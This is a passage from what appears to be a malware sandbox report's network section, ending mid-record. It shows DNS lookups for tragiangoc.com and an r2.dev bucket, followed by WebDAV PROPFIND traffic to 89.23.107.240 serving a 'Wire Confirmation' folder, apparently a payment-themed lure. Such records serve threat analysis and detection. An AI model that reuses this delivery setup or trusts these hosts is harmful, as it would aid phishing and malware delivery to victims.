                      Apr 16, 2024 16:26:38.055531025 CEST49764443192.168.2.464.233.185.147
                      Apr 16, 2024 16:26:38.055552959 CEST4434976464.233.185.147192.168.2.4
                      Apr 16, 2024 16:26:42.389931917 CEST804975189.23.107.240192.168.2.4
                      Apr 16, 2024 16:26:42.390008926 CEST4975180192.168.2.489.23.107.240

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 16, 2024 16:25:21.809940100 CEST53498801.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:21.813898087 CEST53641301.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:22.448323011 CEST53566471.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:23.723448992 CEST5154053192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:23.723575115 CEST6010553192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:23.852214098 CEST53601051.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:23.855133057 CEST6363753192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:23.855242014 CEST4990153192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:23.872196913 CEST53515401.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:23.962443113 CEST53636371.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:23.982563019 CEST53499011.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:25.063254118 CEST6099253192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:25.063776970 CEST6187553192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:25.171405077 CEST53609921.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:25.171489954 CEST53618751.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:26.420095921 CEST5426353192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:26.420095921 CEST5222553192.168.2.41.1.1.1
                      Apr 16, 2024 16:25:26.524800062 CEST53522251.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:26.524833918 CEST53542631.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:39.410037041 CEST53648051.1.1.1192.168.2.4
                      Apr 16, 2024 16:25:46.452960968 CEST138138192.168.2.4192.168.2.255
                      Apr 16, 2024 16:25:58.254872084 CEST53585781.1.1.1192.168.2.4
                      Apr 16, 2024 16:26:21.281596899 CEST53602741.1.1.1192.168.2.4
                      Apr 16, 2024 16:26:21.633800983 CEST53564251.1.1.1192.168.2.4

                      ICMP Packets

                      TimestampSource IPDest IPChecksumCodeType
                      Apr 16, 2024 16:25:23.873995066 CEST192.168.2.41.1.1.1c204(Port unreachable)Destination Unreachable

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Apr 16, 2024 16:25:23.723448992 CEST192.168.2.41.1.1.10xa184Standard query (0)tragiangoc.comA (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.723575115 CEST192.168.2.41.1.1.10x91e1Standard query (0)tragiangoc.com65IN (0x0001)false
                      Apr 16, 2024 16:25:23.855133057 CEST192.168.2.41.1.1.10x9496Standard query (0)tragiangoc.comA (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.855242014 CEST192.168.2.41.1.1.10x2d21Standard query (0)tragiangoc.com65IN (0x0001)false
                      Apr 16, 2024 16:25:25.063254118 CEST192.168.2.41.1.1.10xa3ffStandard query (0)pub-6d8650014e23489d8c6e14ca9312426a.r2.devA (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:25.063776970 CEST192.168.2.41.1.1.10x8570Standard query (0)pub-6d8650014e23489d8c6e14ca9312426a.r2.dev65IN (0x0001)false
                      Apr 16, 2024 16:25:26.420095921 CEST192.168.2.41.1.1.10xbe6bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.420095921 CEST192.168.2.41.1.1.10x95a8Standard query (0)www.google.com65IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Apr 16, 2024 16:25:23.852214098 CEST1.1.1.1192.168.2.40x91e1No error (0)tragiangoc.com65IN (0x0001)false
                      Apr 16, 2024 16:25:23.872196913 CEST1.1.1.1192.168.2.40xa184No error (0)tragiangoc.com104.21.39.145A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.872196913 CEST1.1.1.1192.168.2.40xa184No error (0)tragiangoc.com172.67.170.206A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.962443113 CEST1.1.1.1192.168.2.40x9496No error (0)tragiangoc.com104.21.39.145A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.962443113 CEST1.1.1.1192.168.2.40x9496No error (0)tragiangoc.com172.67.170.206A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:23.982563019 CEST1.1.1.1192.168.2.40x2d21No error (0)tragiangoc.com65IN (0x0001)false
                      Apr 16, 2024 16:25:25.171405077 CEST1.1.1.1192.168.2.40xa3ffNo error (0)pub-6d8650014e23489d8c6e14ca9312426a.r2.dev104.18.3.35A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:25.171405077 CEST1.1.1.1192.168.2.40xa3ffNo error (0)pub-6d8650014e23489d8c6e14ca9312426a.r2.dev104.18.2.35A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524800062 CEST1.1.1.1192.168.2.40x95a8No error (0)www.google.com65IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.147A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.106A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.104A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.99A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.105A (IP address)IN (0x0001)false
                      Apr 16, 2024 16:25:26.524833918 CEST1.1.1.1192.168.2.40xbe6bNo error (0)www.google.com64.233.185.103A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • tragiangoc.com
                      • https:
                        • pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      • fs.microsoft.com
                      • slscr.update.microsoft.com
                      • 89.23.107.240

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44975189.23.107.240801068C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:11.703726053 CEST102OUTOPTIONS / HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: DavClnt
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:11.916481018 CEST177INHTTP/1.1 200 OK
                      Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                      Dav: 1, 2
                      Ms-Author-Via: DAV
                      Date: Tue, 16 Apr 2024 14:26:11 GMT
                      Content-Length: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44975289.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:15.308476925 CEST151OUTOPTIONS /Wire%20Confirmation HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:15.521508932 CEST177INHTTP/1.1 200 OK
                      Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                      Dav: 1, 2
                      Ms-Author-Via: DAV
                      Date: Tue, 16 Apr 2024 14:26:15 GMT
                      Content-Length: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44975389.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:16.285233021 CEST181OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:16.499742031 CEST683INHTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Content-Length: 557
                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 32 3a 30 37 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44975589.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:16.800148964 CEST181OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:17.017056942 CEST683INHTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Content-Length: 557
                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 32 3a 30 37 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>Wire Confirmation</D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44975689.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:18.096744061 CEST193OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 64 65 73 6b 74 6f 70 2e 69 6e 69 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41
                      Data Ascii: PROPFIND /Wire%20Confirmation/desktop.ini HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:18.313426018 CEST132INHTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:18 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44975789.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:18.705857992 CEST181OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:18.917215109 CEST683INHTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:18 GMT
                      Content-Length: 557
                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 32 3a 30 37 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44975889.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:19.130564928 CEST193OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 64 65 73 6b 74 6f 70 2e 69 6e 69 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41
                      Data Ascii: PROPFIND /Wire%20Confirmation/desktop.ini HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:19.342358112 CEST132INHTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:19 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.44975989.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:19.556150913 CEST181OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:19.767590046 CEST683INHTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:19 GMT
                      Content-Length: 557
                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 32 3a 30 37 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.44976089.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:19.988154888 CEST181OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 1translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:20.199944019 CEST1289INHTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:20 GMT
                      Content-Length: 1181
                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 32 3a 30 37 20 47 4d 54 3c 2f 44 